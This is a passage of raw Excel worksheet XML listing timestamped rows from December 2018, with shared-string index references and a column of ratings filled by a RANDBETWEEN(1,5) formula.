        <v>43447.020381944443</v>
      </c>
      <c r="C5833" t="s">
        <v>10</v>
      </c>
      <c r="D5833" t="s">
        <v>56</v>
      </c>
      <c r="E5833" t="s">
        <v>5358</v>
      </c>
      <c r="F5833">
        <f t="shared" ca="1" si="91"/>
        <v>3</v>
      </c>
    </row>
    <row r="5834" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5834" s="1">
        <v>43447.018703703703</v>
      </c>
      <c r="C5834" t="s">
        <v>2082</v>
      </c>
      <c r="F5834">
        <f t="shared" ca="1" si="91"/>
        <v>2</v>
      </c>
    </row>
    <row r="5835" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5835" s="1">
        <v>43447.013067129628</v>
      </c>
      <c r="C5835" t="s">
        <v>11</v>
      </c>
      <c r="E5835" t="s">
        <v>5359</v>
      </c>
      <c r="F5835">
        <f t="shared" ca="1" si="91"/>
        <v>5</v>
      </c>
    </row>
    <row r="5836" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5836" s="1">
        <v>43447.012754629628</v>
      </c>
      <c r="C5836" t="s">
        <v>222</v>
      </c>
      <c r="D5836" t="s">
        <v>312</v>
      </c>
      <c r="E5836" t="s">
        <v>5234</v>
      </c>
      <c r="F5836">
        <f t="shared" ca="1" si="91"/>
        <v>5</v>
      </c>
    </row>
    <row r="5837" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A5837" s="1">
        <v>43446.903946759259</v>
      </c>
      <c r="C5837" t="s">
        <v>48</v>
      </c>
      <c r="E5837" s="2" t="s">
        <v>5360</v>
      </c>
      <c r="F5837">
        <f t="shared" ca="1" si="91"/>
        <v>5</v>
      </c>
    </row>
    <row r="5838" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5838" s="1">
        <v>43446.737858796296</v>
      </c>
      <c r="C5838" t="s">
        <v>5361</v>
      </c>
      <c r="D5838" t="s">
        <v>158</v>
      </c>
      <c r="E5838" t="s">
        <v>5362</v>
      </c>
      <c r="F5838">
        <f t="shared" ca="1" si="91"/>
        <v>4</v>
      </c>
    </row>
    <row r="5839" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5839" s="1">
        <v>43446.702499999999</v>
      </c>
      <c r="C5839" t="s">
        <v>6</v>
      </c>
      <c r="D5839" t="s">
        <v>25</v>
      </c>
      <c r="F5839">
        <f t="shared" ca="1" si="91"/>
        <v>3</v>
      </c>
    </row>
    <row r="5840" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5840" s="1">
        <v>43446.702476851853</v>
      </c>
      <c r="C5840" t="s">
        <v>6</v>
      </c>
      <c r="D5840" t="s">
        <v>25</v>
      </c>
      <c r="F5840">
        <f t="shared" ca="1" si="91"/>
        <v>1</v>
      </c>
    </row>
    <row r="5841" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5841" s="1">
        <v>43446.699791666666</v>
      </c>
      <c r="C5841" t="s">
        <v>6</v>
      </c>
      <c r="D5841" t="s">
        <v>25</v>
      </c>
      <c r="F5841">
        <f t="shared" ca="1" si="91"/>
        <v>5</v>
      </c>
    </row>
    <row r="5842" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A5842" s="1">
        <v>43446.646192129629</v>
      </c>
      <c r="C5842" t="s">
        <v>41</v>
      </c>
      <c r="E5842" s="2" t="s">
        <v>5363</v>
      </c>
      <c r="F5842">
        <f t="shared" ca="1" si="91"/>
        <v>4</v>
      </c>
    </row>
    <row r="5843" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5843" s="1">
        <v>43446.602685185186</v>
      </c>
      <c r="C5843" t="s">
        <v>10</v>
      </c>
      <c r="D5843" t="s">
        <v>6</v>
      </c>
      <c r="E5843" t="s">
        <v>5364</v>
      </c>
      <c r="F5843">
        <f t="shared" ca="1" si="91"/>
        <v>5</v>
      </c>
    </row>
    <row r="5844" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5844" s="1">
        <v>43446.595949074072</v>
      </c>
      <c r="C5844" t="s">
        <v>10</v>
      </c>
      <c r="D5844" t="s">
        <v>178</v>
      </c>
      <c r="E5844" t="s">
        <v>5365</v>
      </c>
      <c r="F5844">
        <f t="shared" ca="1" si="91"/>
        <v>1</v>
      </c>
    </row>
    <row r="5845" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5845" s="1">
        <v>43446.590370370373</v>
      </c>
      <c r="C5845" t="s">
        <v>6</v>
      </c>
      <c r="D5845" t="s">
        <v>25</v>
      </c>
      <c r="E5845" t="s">
        <v>5366</v>
      </c>
      <c r="F5845">
        <f t="shared" ca="1" si="91"/>
        <v>4</v>
      </c>
    </row>
    <row r="5846" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5846" s="1">
        <v>43446.575196759259</v>
      </c>
      <c r="C5846" t="s">
        <v>10</v>
      </c>
      <c r="D5846" t="s">
        <v>6</v>
      </c>
      <c r="E5846" t="s">
        <v>5367</v>
      </c>
      <c r="F5846">
        <f t="shared" ca="1" si="91"/>
        <v>4</v>
      </c>
    </row>
    <row r="5847" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A5847" s="1">
        <v>43446.574074074073</v>
      </c>
      <c r="C5847" t="s">
        <v>10</v>
      </c>
      <c r="D5847" t="s">
        <v>89</v>
      </c>
      <c r="E5847" s="2" t="s">
        <v>5368</v>
      </c>
      <c r="F5847">
        <f t="shared" ca="1" si="91"/>
        <v>2</v>
      </c>
    </row>
    <row r="5848" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5848" s="1">
        <v>43446.558541666665</v>
      </c>
      <c r="C5848" t="s">
        <v>10</v>
      </c>
      <c r="D5848" t="s">
        <v>112</v>
      </c>
      <c r="E5848" t="s">
        <v>5369</v>
      </c>
      <c r="F5848">
        <f t="shared" ca="1" si="91"/>
        <v>5</v>
      </c>
    </row>
    <row r="5849" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5849" s="1">
        <v>43446.555289351854</v>
      </c>
      <c r="C5849" t="s">
        <v>10</v>
      </c>
      <c r="D5849" t="s">
        <v>6</v>
      </c>
      <c r="E5849" t="s">
        <v>5370</v>
      </c>
      <c r="F5849">
        <f t="shared" ca="1" si="91"/>
        <v>2</v>
      </c>
    </row>
    <row r="5850" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5850" s="1">
        <v>43446.53733796296</v>
      </c>
      <c r="C5850" t="s">
        <v>10</v>
      </c>
      <c r="D5850" t="s">
        <v>80</v>
      </c>
      <c r="E5850" t="s">
        <v>5371</v>
      </c>
      <c r="F5850">
        <f t="shared" ca="1" si="91"/>
        <v>5</v>
      </c>
    </row>
    <row r="5851" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A5851" s="1">
        <v>43446.5156712963</v>
      </c>
      <c r="C5851" t="s">
        <v>10</v>
      </c>
      <c r="D5851" t="s">
        <v>89</v>
      </c>
      <c r="E5851" s="2" t="s">
        <v>5372</v>
      </c>
      <c r="F5851">
        <f t="shared" ca="1" si="91"/>
        <v>2</v>
      </c>
    </row>
    <row r="5852" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A5852" s="1">
        <v>43446.513020833336</v>
      </c>
      <c r="C5852" t="s">
        <v>10</v>
      </c>
      <c r="D5852" t="s">
        <v>178</v>
      </c>
      <c r="E5852" s="2" t="s">
        <v>5373</v>
      </c>
      <c r="F5852">
        <f t="shared" ca="1" si="91"/>
        <v>5</v>
      </c>
    </row>
    <row r="5853" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A5853" s="1">
        <v>43446.496840277781</v>
      </c>
      <c r="C5853" t="s">
        <v>48</v>
      </c>
      <c r="E5853" s="2" t="s">
        <v>5374</v>
      </c>
      <c r="F5853">
        <f t="shared" ca="1" si="91"/>
        <v>4</v>
      </c>
    </row>
    <row r="5854" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5854" s="1">
        <v>43446.485393518517</v>
      </c>
      <c r="C5854" t="s">
        <v>60</v>
      </c>
      <c r="E5854" t="s">
        <v>5375</v>
      </c>
      <c r="F5854">
        <f t="shared" ca="1" si="91"/>
        <v>1</v>
      </c>
    </row>
    <row r="5855" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A5855" s="1">
        <v>43446.483749999999</v>
      </c>
      <c r="C5855" t="s">
        <v>623</v>
      </c>
      <c r="E5855" s="2" t="s">
        <v>5376</v>
      </c>
      <c r="F5855">
        <f t="shared" ca="1" si="91"/>
        <v>2</v>
      </c>
    </row>
    <row r="5856" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5856" s="1">
        <v>43446.456689814811</v>
      </c>
      <c r="C5856" t="s">
        <v>10</v>
      </c>
      <c r="D5856" t="s">
        <v>36</v>
      </c>
      <c r="E5856" t="s">
        <v>5377</v>
      </c>
      <c r="F5856">
        <f t="shared" ca="1" si="91"/>
        <v>2</v>
      </c>
    </row>
    <row r="5857" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5857" s="1">
        <v>43446.441805555558</v>
      </c>
      <c r="C5857" t="s">
        <v>60</v>
      </c>
      <c r="F5857">
        <f t="shared" ca="1" si="91"/>
        <v>5</v>
      </c>
    </row>
    <row r="5858" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A5858" s="1">
        <v>43446.426469907405</v>
      </c>
      <c r="C5858" t="s">
        <v>734</v>
      </c>
      <c r="E5858" s="2" t="s">
        <v>5378</v>
      </c>
      <c r="F5858">
        <f t="shared" ca="1" si="91"/>
        <v>2</v>
      </c>
    </row>
    <row r="5859" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A5859" s="1">
        <v>43446.424803240741</v>
      </c>
      <c r="C5859" t="s">
        <v>6</v>
      </c>
      <c r="D5859" t="s">
        <v>25</v>
      </c>
      <c r="E5859" s="2" t="s">
        <v>5379</v>
      </c>
      <c r="F5859">
        <f t="shared" ca="1" si="91"/>
        <v>4</v>
      </c>
    </row>
    <row r="5860" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5860" s="1">
        <v>43446.412407407406</v>
      </c>
      <c r="C5860" t="s">
        <v>60</v>
      </c>
      <c r="E5860" t="s">
        <v>5380</v>
      </c>
      <c r="F5860">
        <f t="shared" ca="1" si="91"/>
        <v>4</v>
      </c>
    </row>
    <row r="5861" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5861" s="1">
        <v>43446.407152777778</v>
      </c>
      <c r="C5861" t="s">
        <v>10</v>
      </c>
      <c r="D5861" t="s">
        <v>381</v>
      </c>
      <c r="E5861" t="s">
        <v>5381</v>
      </c>
      <c r="F5861">
        <f t="shared" ca="1" si="91"/>
        <v>1</v>
      </c>
    </row>
    <row r="5862" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5862" s="1">
        <v>43446.385578703703</v>
      </c>
      <c r="C5862" t="s">
        <v>60</v>
      </c>
      <c r="E5862" t="s">
        <v>4941</v>
      </c>
      <c r="F5862">
        <f t="shared" ca="1" si="91"/>
        <v>4</v>
      </c>
    </row>
    <row r="5863" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A5863" s="1">
        <v>43446.379016203704</v>
      </c>
      <c r="C5863" t="s">
        <v>124</v>
      </c>
      <c r="E5863" s="2" t="s">
        <v>5382</v>
      </c>
      <c r="F5863">
        <f t="shared" ca="1" si="91"/>
        <v>3</v>
      </c>
    </row>
    <row r="5864" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A5864" s="1">
        <v>43446.372731481482</v>
      </c>
      <c r="C5864" t="s">
        <v>461</v>
      </c>
      <c r="E5864" s="2" t="s">
        <v>5383</v>
      </c>
      <c r="F5864">
        <f t="shared" ca="1" si="91"/>
        <v>5</v>
      </c>
    </row>
    <row r="5865" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A5865" s="1">
        <v>43446.366273148145</v>
      </c>
      <c r="C5865" t="s">
        <v>197</v>
      </c>
      <c r="E5865" s="2" t="s">
        <v>5384</v>
      </c>
      <c r="F5865">
        <f t="shared" ca="1" si="91"/>
        <v>2</v>
      </c>
    </row>
    <row r="5866" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5866" s="1">
        <v>43446.362905092596</v>
      </c>
      <c r="C5866" t="s">
        <v>48</v>
      </c>
      <c r="E5866" t="s">
        <v>5385</v>
      </c>
      <c r="F5866">
        <f t="shared" ca="1" si="91"/>
        <v>5</v>
      </c>
    </row>
    <row r="5867" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A5867" s="1">
        <v>43446.362268518518</v>
      </c>
      <c r="C5867" t="s">
        <v>166</v>
      </c>
      <c r="E5867" s="2" t="s">
        <v>5386</v>
      </c>
      <c r="F5867">
        <f t="shared" ca="1" si="91"/>
        <v>4</v>
      </c>
    </row>
    <row r="5868" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5868" s="1">
        <v>43446.361307870371</v>
      </c>
      <c r="C5868" t="s">
        <v>166</v>
      </c>
      <c r="F5868">
        <f t="shared" ca="1" si="91"/>
        <v>1</v>
      </c>
    </row>
    <row r="5869" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5869" s="1">
        <v>43446.34648148148</v>
      </c>
      <c r="C5869" t="s">
        <v>17</v>
      </c>
      <c r="E5869" t="s">
        <v>5387</v>
      </c>
      <c r="F5869">
        <f t="shared" ca="1" si="91"/>
        <v>3</v>
      </c>
    </row>
    <row r="5870" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A5870" s="1">
        <v>43446.326608796298</v>
      </c>
      <c r="C5870" t="s">
        <v>71</v>
      </c>
      <c r="E5870" s="2" t="s">
        <v>5388</v>
      </c>
      <c r="F5870">
        <f t="shared" ca="1" si="91"/>
        <v>4</v>
      </c>
    </row>
    <row r="5871" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5871" s="1">
        <v>43446.323310185187</v>
      </c>
      <c r="C5871" t="s">
        <v>48</v>
      </c>
      <c r="E5871" t="s">
        <v>5389</v>
      </c>
      <c r="F5871">
        <f t="shared" ca="1" si="91"/>
        <v>2</v>
      </c>
    </row>
    <row r="5872" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5872" s="1">
        <v>43446.271539351852</v>
      </c>
      <c r="C5872" t="s">
        <v>10</v>
      </c>
      <c r="D5872" t="s">
        <v>151</v>
      </c>
      <c r="F5872">
        <f t="shared" ca="1" si="91"/>
        <v>1</v>
      </c>
    </row>
    <row r="5873" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A5873" s="1">
        <v>43446.258715277778</v>
      </c>
      <c r="C5873" t="s">
        <v>314</v>
      </c>
      <c r="E5873" s="2" t="s">
        <v>5390</v>
      </c>
      <c r="F5873">
        <f t="shared" ca="1" si="91"/>
        <v>1</v>
      </c>
    </row>
    <row r="5874" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5874" s="1">
        <v>43446.253854166665</v>
      </c>
      <c r="C5874" t="s">
        <v>410</v>
      </c>
      <c r="D5874" t="s">
        <v>312</v>
      </c>
      <c r="E5874" t="s">
        <v>5391</v>
      </c>
      <c r="F5874">
        <f t="shared" ca="1" si="91"/>
        <v>4</v>
      </c>
    </row>
    <row r="5875" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5875" s="1">
        <v>43446.246527777781</v>
      </c>
      <c r="C5875" t="s">
        <v>10</v>
      </c>
      <c r="D5875" t="s">
        <v>33</v>
      </c>
      <c r="F5875">
        <f t="shared" ca="1" si="91"/>
        <v>4</v>
      </c>
    </row>
    <row r="5876" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5876" s="1">
        <v>43446.228622685187</v>
      </c>
      <c r="C5876" t="s">
        <v>10</v>
      </c>
      <c r="D5876" t="s">
        <v>33</v>
      </c>
      <c r="F5876">
        <f t="shared" ca="1" si="91"/>
        <v>5</v>
      </c>
    </row>
    <row r="5877" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5877" s="1">
        <v>43446.224085648151</v>
      </c>
      <c r="C5877" t="s">
        <v>1325</v>
      </c>
      <c r="E5877" t="s">
        <v>5068</v>
      </c>
      <c r="F5877">
        <f t="shared" ca="1" si="91"/>
        <v>2</v>
      </c>
    </row>
    <row r="5878" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5878" s="1">
        <v>43446.207731481481</v>
      </c>
      <c r="C5878" t="s">
        <v>226</v>
      </c>
      <c r="E5878" t="s">
        <v>5068</v>
      </c>
      <c r="F5878">
        <f t="shared" ca="1" si="91"/>
        <v>3</v>
      </c>
    </row>
    <row r="5879" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5879" s="1">
        <v>43446.202951388892</v>
      </c>
      <c r="C5879" t="s">
        <v>318</v>
      </c>
      <c r="E5879" t="s">
        <v>13</v>
      </c>
      <c r="F5879">
        <f t="shared" ca="1" si="91"/>
        <v>5</v>
      </c>
    </row>
    <row r="5880" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A5880" s="1">
        <v>43446.191967592589</v>
      </c>
      <c r="C5880" t="s">
        <v>140</v>
      </c>
      <c r="D5880" t="s">
        <v>46</v>
      </c>
      <c r="E5880" s="2" t="s">
        <v>5392</v>
      </c>
      <c r="F5880">
        <f t="shared" ca="1" si="91"/>
        <v>1</v>
      </c>
    </row>
    <row r="5881" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5881" s="1">
        <v>43446.167199074072</v>
      </c>
      <c r="C5881" t="s">
        <v>2745</v>
      </c>
      <c r="E5881" t="s">
        <v>5068</v>
      </c>
      <c r="F5881">
        <f t="shared" ca="1" si="91"/>
        <v>4</v>
      </c>
    </row>
    <row r="5882" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5882" s="1">
        <v>43446.161863425928</v>
      </c>
      <c r="C5882" t="s">
        <v>2745</v>
      </c>
      <c r="E5882" t="s">
        <v>5068</v>
      </c>
      <c r="F5882">
        <f t="shared" ca="1" si="91"/>
        <v>5</v>
      </c>
    </row>
    <row r="5883" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A5883" s="1">
        <v>43446.155486111114</v>
      </c>
      <c r="C5883" t="s">
        <v>477</v>
      </c>
      <c r="E5883" s="2" t="s">
        <v>5393</v>
      </c>
      <c r="F5883">
        <f t="shared" ca="1" si="91"/>
        <v>3</v>
      </c>
    </row>
    <row r="5884" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5884" s="1">
        <v>43446.150127314817</v>
      </c>
      <c r="C5884" t="s">
        <v>41</v>
      </c>
      <c r="F5884">
        <f t="shared" ca="1" si="91"/>
        <v>1</v>
      </c>
    </row>
    <row r="5885" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5885" s="1">
        <v>43446.148842592593</v>
      </c>
      <c r="C5885" t="s">
        <v>2108</v>
      </c>
      <c r="F5885">
        <f t="shared" ca="1" si="91"/>
        <v>5</v>
      </c>
    </row>
    <row r="5886" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5886" s="1">
        <v>43446.140208333331</v>
      </c>
      <c r="C5886" t="s">
        <v>10</v>
      </c>
      <c r="D5886" t="s">
        <v>6</v>
      </c>
      <c r="F5886">
        <f t="shared" ca="1" si="91"/>
        <v>2</v>
      </c>
    </row>
    <row r="5887" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5887" s="1">
        <v>43446.140150462961</v>
      </c>
      <c r="C5887" t="s">
        <v>10</v>
      </c>
      <c r="D5887" t="s">
        <v>6</v>
      </c>
      <c r="F5887">
        <f t="shared" ca="1" si="91"/>
        <v>4</v>
      </c>
    </row>
    <row r="5888" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A5888" s="1">
        <v>43446.138981481483</v>
      </c>
      <c r="C5888" t="s">
        <v>454</v>
      </c>
      <c r="E5888" s="2" t="s">
        <v>5394</v>
      </c>
      <c r="F5888">
        <f t="shared" ca="1" si="91"/>
        <v>5</v>
      </c>
    </row>
    <row r="5889" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A5889" s="1">
        <v>43446.127997685187</v>
      </c>
      <c r="C5889" t="s">
        <v>3027</v>
      </c>
      <c r="D5889" t="s">
        <v>178</v>
      </c>
      <c r="E5889" s="2" t="s">
        <v>3970</v>
      </c>
      <c r="F5889">
        <f t="shared" ca="1" si="91"/>
        <v>4</v>
      </c>
    </row>
    <row r="5890" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5890" s="1">
        <v>43446.122731481482</v>
      </c>
      <c r="C5890" t="s">
        <v>226</v>
      </c>
      <c r="E5890" t="s">
        <v>5395</v>
      </c>
      <c r="F5890">
        <f t="shared" ref="F5890:F5953" ca="1" si="92">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="5891" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5891" s="1">
        <v>43446.120671296296</v>
      </c>
      <c r="C5891" t="s">
        <v>10</v>
      </c>
      <c r="D5891" t="s">
        <v>6</v>
      </c>
      <c r="F5891">
        <f t="shared" ca="1" si="92"/>
        <v>3</v>
      </c>
    </row>
    <row r="5892" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5892" s="1">
        <v>43446.109224537038</v>
      </c>
      <c r="C5892" t="s">
        <v>103</v>
      </c>
      <c r="E5892" t="s">
        <v>5396</v>
      </c>
      <c r="F5892">
        <f t="shared" ca="1" si="92"/>
        <v>3</v>
      </c>
    </row>
    <row r="5893" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5893" s="1">
        <v>43446.103831018518</v>
      </c>
      <c r="C5893" t="s">
        <v>2082</v>
      </c>
      <c r="F5893">
        <f t="shared" ca="1" si="92"/>
        <v>5</v>
      </c>
    </row>
    <row r="5894" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A5894" s="1">
        <v>43446.101412037038</v>
      </c>
      <c r="C5894" t="s">
        <v>1050</v>
      </c>
      <c r="D5894" t="s">
        <v>312</v>
      </c>
      <c r="E5894" s="2" t="s">
        <v>5397</v>
      </c>
      <c r="F5894">
        <f t="shared" ca="1" si="92"/>
        <v>2</v>
      </c>
    </row>
    <row r="5895" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5895" s="1">
        <v>43446.095358796294</v>
      </c>
      <c r="C5895" t="s">
        <v>139</v>
      </c>
      <c r="E5895" t="s">
        <v>5398</v>
      </c>
      <c r="F5895">
        <f t="shared" ca="1" si="92"/>
        <v>1</v>
      </c>
    </row>
    <row r="5896" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5896" s="1">
        <v>43446.088125000002</v>
      </c>
      <c r="C5896" t="s">
        <v>10</v>
      </c>
      <c r="D5896" t="s">
        <v>251</v>
      </c>
      <c r="F5896">
        <f t="shared" ca="1" si="92"/>
        <v>3</v>
      </c>
    </row>
    <row r="5897" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5897" s="1">
        <v>43446.078240740739</v>
      </c>
      <c r="C5897" t="s">
        <v>1130</v>
      </c>
      <c r="E5897" t="s">
        <v>5399</v>
      </c>
      <c r="F5897">
        <f t="shared" ca="1" si="92"/>
        <v>1</v>
      </c>
    </row>
    <row r="5898" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5898" s="1">
        <v>43446.071006944447</v>
      </c>
      <c r="C5898" t="s">
        <v>10</v>
      </c>
      <c r="D5898" t="s">
        <v>36</v>
      </c>
      <c r="E5898" t="s">
        <v>5400</v>
      </c>
      <c r="F5898">
        <f t="shared" ca="1" si="92"/>
        <v>5</v>
      </c>
    </row>
    <row r="5899" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5899" s="1">
        <v>43446.067881944444</v>
      </c>
      <c r="C5899" t="s">
        <v>226</v>
      </c>
      <c r="E5899" t="s">
        <v>5068</v>
      </c>
      <c r="F5899">
        <f t="shared" ca="1" si="92"/>
        <v>1</v>
      </c>
    </row>
    <row r="5900" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5900" s="1">
        <v>43446.06318287037</v>
      </c>
      <c r="C5900" t="s">
        <v>226</v>
      </c>
      <c r="E5900" t="s">
        <v>5068</v>
      </c>
      <c r="F5900">
        <f t="shared" ca="1" si="92"/>
        <v>3</v>
      </c>
    </row>
    <row r="5901" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5901" s="1">
        <v>43446.060347222221</v>
      </c>
      <c r="C5901" t="s">
        <v>10</v>
      </c>
      <c r="D5901" t="s">
        <v>6</v>
      </c>
      <c r="F5901">
        <f t="shared" ca="1" si="92"/>
        <v>4</v>
      </c>
    </row>
    <row r="5902" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5902" s="1">
        <v>43446.057881944442</v>
      </c>
      <c r="C5902" t="s">
        <v>2082</v>
      </c>
      <c r="F5902">
        <f t="shared" ca="1" si="92"/>
        <v>2</v>
      </c>
    </row>
    <row r="5903" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5903" s="1">
        <v>43446.056168981479</v>
      </c>
      <c r="C5903" t="s">
        <v>1130</v>
      </c>
      <c r="E5903" t="s">
        <v>5401</v>
      </c>
      <c r="F5903">
        <f t="shared" ca="1" si="92"/>
        <v>2</v>
      </c>
    </row>
    <row r="5904" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5904" s="1">
        <v>43446.047418981485</v>
      </c>
      <c r="C5904" t="s">
        <v>10</v>
      </c>
      <c r="D5904" t="s">
        <v>6</v>
      </c>
      <c r="E5904" t="s">
        <v>776</v>
      </c>
      <c r="F5904">
        <f t="shared" ca="1" si="92"/>
        <v>4</v>
      </c>
    </row>
    <row r="5905" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5905" s="1">
        <v>43446.044583333336</v>
      </c>
      <c r="C5905" t="s">
        <v>10</v>
      </c>
      <c r="D5905" t="s">
        <v>6</v>
      </c>
      <c r="E5905" t="s">
        <v>5243</v>
      </c>
      <c r="F5905">
        <f t="shared" ca="1" si="92"/>
        <v>5</v>
      </c>
    </row>
    <row r="5906" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5906" s="1">
        <v>43446.043379629627</v>
      </c>
      <c r="C5906" t="s">
        <v>226</v>
      </c>
      <c r="E5906" t="s">
        <v>5068</v>
      </c>
      <c r="F5906">
        <f t="shared" ca="1" si="92"/>
        <v>3</v>
      </c>
    </row>
    <row r="5907" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5907" s="1">
        <v>43446.042314814818</v>
      </c>
      <c r="C5907" t="s">
        <v>10</v>
      </c>
      <c r="D5907" t="s">
        <v>36</v>
      </c>
      <c r="E5907" t="s">
        <v>5402</v>
      </c>
      <c r="F5907">
        <f t="shared" ca="1" si="92"/>
        <v>2</v>
      </c>
    </row>
    <row r="5908" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5908" s="1">
        <v>43446.040254629632</v>
      </c>
      <c r="C5908" t="s">
        <v>1130</v>
      </c>
      <c r="E5908" t="s">
        <v>2519</v>
      </c>
      <c r="F5908">
        <f t="shared" ca="1" si="92"/>
        <v>2</v>
      </c>
    </row>
    <row r="5909" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5909" s="1">
        <v>43446.036099537036</v>
      </c>
      <c r="C5909" t="s">
        <v>226</v>
      </c>
      <c r="E5909" t="s">
        <v>5068</v>
      </c>
      <c r="F5909">
        <f t="shared" ca="1" si="92"/>
        <v>4</v>
      </c>
    </row>
    <row r="5910" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5910" s="1">
        <v>43446.034155092595</v>
      </c>
      <c r="C5910" t="s">
        <v>10</v>
      </c>
      <c r="D5910" t="s">
        <v>6</v>
      </c>
      <c r="E5910" t="s">
        <v>776</v>
      </c>
      <c r="F5910">
        <f t="shared" ca="1" si="92"/>
        <v>2</v>
      </c>
    </row>
    <row r="5911" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5911" s="1">
        <v>43446.031631944446</v>
      </c>
      <c r="C5911" t="s">
        <v>1130</v>
      </c>
      <c r="E5911">
        <v>182164</v>
      </c>
      <c r="F5911">
        <f t="shared" ca="1" si="92"/>
        <v>4</v>
      </c>
    </row>
    <row r="5912" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5912" s="1">
        <v>43446.031423611108</v>
      </c>
      <c r="C5912" t="s">
        <v>1325</v>
      </c>
      <c r="E5912" t="s">
        <v>5068</v>
      </c>
      <c r="F5912">
        <f t="shared" ca="1" si="92"/>
        <v>2</v>
      </c>
    </row>
    <row r="5913" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5913" s="1">
        <v>43446.030543981484</v>
      </c>
      <c r="C5913" t="s">
        <v>2082</v>
      </c>
      <c r="F5913">
        <f t="shared" ca="1" si="92"/>
        <v>1</v>
      </c>
    </row>
    <row r="5914" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5914" s="1">
        <v>43446.030486111114</v>
      </c>
      <c r="C5914" t="s">
        <v>2082</v>
      </c>
      <c r="F5914">
        <f t="shared" ca="1" si="92"/>
        <v>4</v>
      </c>
    </row>
    <row r="5915" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5915" s="1">
        <v>43446.030439814815</v>
      </c>
      <c r="C5915" t="s">
        <v>2082</v>
      </c>
      <c r="F5915">
        <f t="shared" ca="1" si="92"/>
        <v>2</v>
      </c>
    </row>
    <row r="5916" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5916" s="1">
        <v>43446.024722222224</v>
      </c>
      <c r="C5916" t="s">
        <v>226</v>
      </c>
      <c r="E5916" t="s">
        <v>2519</v>
      </c>
      <c r="F5916">
        <f t="shared" ca="1" si="92"/>
        <v>4</v>
      </c>
    </row>
    <row r="5917" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5917" s="1">
        <v>43446.019201388888</v>
      </c>
